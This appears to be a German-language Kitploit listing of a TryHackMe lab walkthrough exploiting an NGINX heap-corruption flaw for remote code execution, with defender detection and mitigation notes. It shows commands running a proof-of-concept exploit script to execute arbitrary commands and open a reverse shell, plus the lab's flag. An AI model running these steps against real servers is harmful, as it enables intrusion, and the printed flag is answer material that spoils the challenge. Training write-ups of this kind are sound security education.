Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough — This lab demonstrates the exploitation of CVE-2024-24945, a heap corruption vulnerability affecting NGINX. The objective was to understand how memory corruption can lead to Remote Code Execution (RCE) and gain practical experience in exploitation, detection, and mitigation techniques. | Kitploit
Tools/GitHubGitHub/benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & EducationBinary ExploitationLabs & Practice

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

GitHub
benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough

CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough

Repository anzeigen
vor 2 MonatenNoch nicht geprüft

This lab demonstrates the exploitation of CVE-2024-24945, a heap corruption vulnerability affecting NGINX. The objective was to understand how memory corruption can lead to Remote Code Execution (RCE) and gain practical experience in exploitation, detection, and mitigation techniques.

Teilen

CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough

Dieses Labor demonstriert die Ausnutzung von CVE-2024-24945, einer Heap-Korruptions-Schwachstelle, die NGINX betrifft. Ziel war es zu verstehen, wie Speicherkorruption zu Remote Code Execution (RCE) führen kann, und praktische Erfahrungen in Exploitation, Erkennung und Abwehrtechniken zu sammeln.

Ziele

. Den anfälligen NGINX-Dienst überprüfen. . Beliebige Befehle mit dem bereitgestellten Proof of Concept (PoC) ausführen. . Eine Reverse Shell auf dem Zielcontainer erhalten. . Die Herausforderungsflagge abrufen. . Erkennungs- und Abwehrstrategien verstehen.

Laborumgebung

. Plattform: TryHackMe . Zieldienst: NGINX RIFT . Containerisierte Umgebung: Docker . Exploit-Tool: poc.py . Zugriffsmethode: VNC (Virtual Network Computing)

Methodik

  1. Dienstüberprüfung
  2. bestätigt, dass der anfällige Container lief und erreichbar war.
root@kitploit:~
sudo docker ps
curl -s http://127.0.0.1:19321/api/users/42

Backend in Ordnung

  1. Remote Code Execution

Führte den bereitgestellten PoC aus, um die Ausführung beliebiger Befehle zu validieren.

root@kitploit:~
pytho3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned

Erfolgreiche Ausführung überprüft:

root@kitploit:~
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned

Ausgabe: hello from depthfirst

Reverse Shell Zugriff

Eine interaktive Shell auf dem Zielcontainer einrichten.

root@kitploit:~
python3 poc.py --shell

Erfolgreiche Verbindung:

[] Warte auf Reverse-Shell auf Port 1337... [] verbunden. $

  1. Flaggenabruf

Auf die Herausforderungsflagge zugegriffen.

root@kitploit:~
cat /flag.txt

Flagge:

THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}

Erkennungsmöglichkeiten

Verteidiger können Ausnutzungsversuche identifizieren durch:

. NGINX-Worker-Abstürze . Segmentation-Fault-Ereignisse . Unerwartete ausgehende Netzwerkverbindungen . Verdächtige Shell-Prozesse (/bin/sh,bash) . Unbefugte Dateierstellung in temporären Verzeichnissen

Abwehrstrategien

. Aktualisierung auf eine gepatchte NGINX-Version. . Anwendung des Prinzips der minimalen Rechte . . Einschränkung unnötigen ausgehenden Netzwerkverkehrs Implementieren Sie kontinuierliches Log-Monitoring. . Verwenden Sie Container-Sicherheitskontrollen und Laufzeitüberwachung

Wesentliche Erkenntnisse

Dieses Labor bot praktische Erfahrungen in:

. Verständnis von Heap-Korruptions-Schwachstellen. . Ausnutzung von Remote-Code-Execution-Fehlern. . Einrichtung von Reverse Shells. . Durchführung von Post-Exploitation-Validierung. . Erkennung von Kompromittierungsindikatoren und Abwehrtechniken.

Haftungsausschluss

Diese Übung wurde in einer kontrollierten TryHackMe-Laborumgebung durchgeführt nur für Bildungs- und defensive Cybersicherheitstrainingszwecke.

Autor: [Benedict Ejepu Amaechi] Plattform: TryHackMe Thema: CVE-2024-24945 NGINX RIFT Exploitation und Verteidigung Datum der Fertigstellung: Juni 2026

Tool herunterladen